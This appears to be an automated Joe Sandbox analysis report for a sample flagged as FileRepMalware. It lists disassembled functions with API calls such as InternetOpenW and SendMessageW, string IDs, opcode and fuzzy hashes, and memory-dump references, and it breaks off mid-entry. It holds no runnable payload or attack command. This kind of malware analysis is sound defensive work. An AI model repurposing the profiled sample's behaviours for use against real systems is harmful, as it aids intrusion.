                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \$h
                                                                        • API String ID: 4104443479-677774858
                                                                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID: &
                                                                        • API String ID: 2931989736-1010288
                                                                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00466825
                                                                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CrackInternet_wcslen
                                                                        • String ID: |
                                                                        • API String ID: 596671847-2343686810
                                                                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 0040F858
                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                        • _sprintf.LIBCMT ref: 0040F9AE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_sprintf_strlen
                                                                        • String ID: %02X
                                                                        • API String ID: 1921645428-436463671
                                                                        • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                        • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                        • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                        • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                        • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                        • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                        • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                        • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                        • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                        • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                        • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                        • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                        • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: htonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 3832099526-2422070025
                                                                        • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                        • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                        • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                        • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: InternetOpen
                                                                        • String ID: <local>
                                                                        • API String ID: 2038078732-4266983199
                                                                        • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                        • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                        • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                        • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock_memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 1988441806-3962188686
                                                                        • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                        • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                        • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                        • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: u,D
                                                                        • API String ID: 4104443479-3858472334
                                                                        • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                        • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                        • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                        • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _memmove.LIBCMT ref: 00401B57
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                        • String ID: @EXITCODE
                                                                        • API String ID: 2734553683-3436989551
                                                                        • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                        • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • wsprintfW.USER32 ref: 0045612A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend_mallocwsprintf
                                                                        • String ID: %d/%02d/%02d
                                                                        • API String ID: 1262938277-328681919
                                                                        • Opcode ID: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                        • Opcode Fuzzy Hash: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                        APIs
                                                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                                                        • InternetCloseHandle.WININET ref: 00442668
                                                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                                                        • String ID: aeB
                                                                        • API String ID: 857135153-906807131
                                                                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                        APIs
                                                                        Strings
                                                                        • C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe, xrefs: 0043324B
                                                                        • ^B, xrefs: 00433248
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
